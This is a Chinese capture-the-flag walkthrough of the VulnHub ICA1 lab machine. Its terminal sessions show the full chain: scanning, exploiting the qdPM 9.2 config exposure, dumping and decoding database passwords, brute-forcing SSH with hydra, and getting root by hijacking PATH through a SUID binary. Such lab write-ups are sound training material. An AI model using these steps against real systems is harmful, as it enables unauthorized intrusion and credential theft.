靶机下载链接:https://download.vulnhub.com/ica/ica1.zip
查看当前网卡ip
┌──(kali?kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::20c:29ff:feea:9e42 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:ea:9e:42 txqueuelen 1000 (Ethernet)
RX packets 2 bytes 1180 (1.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12 bytes 1480 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 400 (400.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 400 (400.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
快速扫描当前网络中存活的主机
┌──(kali?kali)-[~]
└─$ sudo nmap -sP -sn -n -T4 --host-timeout 5 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 07:41 EST
Nmap scan report for 192.168.56.1
Host is up (0.00017s latency).
MAC Address: 0A:00:27:00:00:1C (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:91:8F:1F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
MAC Address: 08:00:27:7D:52:AC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.93 seconds
发现目标主机192.168.56.101
进行端口及脚本扫描
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ nmap -A -oN nmap.txt 192.168.56.101
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 07:45 EST
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 11
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SupportsTransactions, SupportsCompression, InteractiveClient, LongPassword, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x04)W(\x1E{\x15\x06\x11beTrS\x01\x15!OQJ
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
发现开放的端口有22,80,3306
打开80端口的页面
发现网站时qdPM 9.2
搜索是否存在漏洞
apers: No Results
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ searchsploit qdPM 9.2
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
查看漏洞描述
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat /usr/share/exploitdb/exploits/php/webapps/50176.txt
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
大概是说访问http:///core/config/databases.yml可以下载到数据库配置文件
下载并查看
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ curl -o databases.yml http://192.168.56.101/core/config/databases.yml
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 283 100 283 0 0 186k 0 --:--:-- --:--:-- --:--:-- 276k
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat databases.yml
all:
doctrine:
class: sfDoctrineDatabase
param:
dsn: 'mysql:dbname=qdpm;host=localhost'
profiler: false
username: qdpmadmin
password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
attributes:
quote_identifier: true
查看密码
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ vim pass.php
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat pass.php
<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ php pass.php
UcVQCMQk2STVeS6J
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
得到数据库信息
数据库名称:qdpm
用户名:qdpmadmin
密码:UcVQCMQk2STVeS6J
登录数据库
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ mysql -h192.168.56.101 -uqdpmadmin -pUcVQCMQk2STVeS6J 9 ?
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 46
Server version: 8.0.26 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
查看存在的数据库
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
6 rows in set (0.013 sec)
查看staff数据库的表
MySQL [(none)]> use staff
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+
3 rows in set (0.002 sec)
查看user表和login表
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.011 sec)
MySQL [staff]> select * from login
-> ;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.002 sec)
保存用户名密码
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ 1 ?
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "smith" >> user.txt 1 ?
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "lucas" >> user.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "travis" >> user.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "dexter" >> user.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "meyer" >> user.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat user.txt
smith
lucas
travis
dexter
meyer
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "c3VSSkFkR3dMcDhkeTNyRg==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "N1p3VjRxdGc0MmNtVVhHWA==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "WDdNUWtQM1cyOWZld0hkQw==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "REpjZVZ5OThXMjhZN3dMZw==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "Y3FObkJXQ0J5UzJEdUpTeQ==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat pass.txt
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
使用得到的账号密码爆破ssh
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ hydra -L user.txt -P pass.txt ssh://192.168.56.101
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-22 09:53:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101 login: travis password: DJceVy98W28Y7wLg
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-22 09:54:00
使用爆破出来的账号密码进行ssh登录
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ ssh travis@192.168.56.101
travis@192.168.56.101's password:
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Dec 10 10:33:02 2021 from 192.168.1.12
travis@debian:~$
查找可以用来提权的文件
travis@debian:~$ find / -user root -perm -4000 2>/dev/null
/opt/get_access
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
将这个/opt/get_access下载到本地
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ scp travis@192.168.56.101:/opt/get_access ./ 1 ?
travis@192.168.56.101's password:
get_access 100% 16KB 8.2MB/s 00:00
使用stings命令查看其中的字符串
┌──(kali?kali)-[~/Desktop/Libs/192.168.56.101]
└─$ strings get_access 127 ?
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
get_access.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
socket@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
发现执行了cat /root/system.info
尝试生成一个恶意的cat命令
travis@debian:~$ cd /tmp
travis@debian:/tmp$ echo "/bin/bash" >> cat
travis@debian:/tmp$ chmod a+x cat
travis@debian:/tmp$ export PATH=/tmp:$PATH
travis@debian:/tmp$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
travis@debian:/tmp$
执行/opt/get_access
travis@debian:/tmp$ /opt/get_access
root@debian:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data),1002(travis)
root@debian:/tmp#
成功提权到root